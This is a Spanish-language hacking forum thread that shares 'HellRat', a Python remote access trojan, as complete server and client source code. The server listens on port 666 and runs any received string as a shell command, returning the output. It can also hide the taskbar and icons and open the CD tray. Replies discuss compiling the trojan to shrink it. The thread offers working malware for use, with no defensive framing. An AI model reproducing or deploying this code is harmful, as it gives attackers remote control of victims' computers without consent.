[Python] HellRat By Doddy H

Iniciado por BigBear, Julio 03, 2011, 09:35:15 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 03, 2011, 09:35:15 PM Ultima modificación: Enero 25, 2013, 07:28:51 PM por 11Sep
Hola , aca traigo un troyano en python con las siguientes
opciones

  • Ocultar inicio
  • Mostrar inicio
  • Ocultar barra de tereas
  • Mostrar barra de tareas
  • Abrir CD
  • Cerrar CD
  • Ejecutar comandos
  • Mostrar informacion

    server.py

    Código: python

    #!usr/bin/python
    #Hell RAt (C) Doddy Hackman 2011

    import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

    print "\n\n[+] Online\n\n"

    slave = socket.socket()
    slave.bind(("",666))
    slave.listen(999)

    a,b = slave.accept()

    while True:
    rex = a.recv(20)
    if re.findall("getso",rex):
      z = os.name
      a.send(z)
    if re.findall("getpath",rex):
      h = os.getcwd()
      a.send(h)
    if re.findall("ocultarinicio",rex):
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostrarinicio",rex):
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("ocultaricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostraricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("abrircd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
    elif re.findall("cerrarcd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
    else:
      rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
      if re:
       a.send(rea.stdout.read())
      else:
       a.send(rea.stderr.read())


    # The End   


    cliente.py

    Código: python

    #!usr/bin/python
    #HellRat (C) Doddy Hackman 2011

    import os,socket,sys

    def head():
    print "\n\n-- == hELLrAT == --\n\n"

    def copyright():
    print "\n\n(C) Doddy Hackman 2011\n\n"

    def clean():
    if sys.platform=="win32":
      os.system("cls")
    else:
      os.system("clear")

    def men():

    try:
      ip = raw_input("[+] IP : ")
      client = socket.socket()
      client.connect((ip,666))
      while True:
       clean()
       print "\n\n[+] Welcome to ",ip,"\n\n"
       print "\n\n[1] Informacion"
       print "[2] CMD"
       print "[3] Abrir CD"
       print "[4] Cerrar CD"
       print "[5] Ocultar iconos"
       print "[6] Mostrar iconos"
       print "[7] Ocultar barra de tareas"
       print "[8] Mostrar barra de tareas"
       print "[9] Cambiar IP"
       print "[10] Salir"
       op = input("\n\n[Opcion] : ")
       if op == 1:
        print "\n\n[+] Informacion\n\n"
        client.send("getso")
        so = client.recv(999)
        client.send("getpath")
        path = client.recv(999)
        print "[+] SO : "+so 
        print "[+] Path : "+path
        raw_input()
       if op == 2:
        cmd = raw_input("\n[CMD] : ")
        client.send(cmd)
        code = client.recv(999)
        print code
        raw_input()
       if op == 3:
        client.send("abrircd")
       if op == 4:
        client.send("cerrarcd")
       if op == 5:
        client.send("ocultaricono")
       if op == 6:
        client.send("mostraricono")
       if op == 7:
        client.send("ocultarinicio")
       if op == 8:
        client.send("mostrarinicio")
       if op == 9:
        men()
       if op == 10:
        client.close()
        copyright()
        raw_input()
        sys.exit(1)
    except:
      print "\n\n[-] Error\n\n"
    head()
    men()

    # The End


Hola, estaba leyendo en el foro que alguien mencionó: "lo malo de python es que para un troyano o cualquier otra cosa debes tener el interprete, ya que si lo compilas, el binario tiende a pesar demasiado"

lo cual me hizo preguntarme:

1.- habrá algún tipo de optimización?
2.- probablemente se pueda hacer algo con el .py y cygwin?

creo que la interrogante 1 se responde aqui: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta donde en realidad esta aplicado a la parte gráfica pero es un inicio, la interrogante 2 aún no la indago

espero este link te ayude a poder compilar tu troyano y reducir el tamaño :)

Gracias por el aporte, muy bueno!!!  :D

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

:) si pueden copiarlo (algun admin) a un sitio que ayude a mas :) seria bueno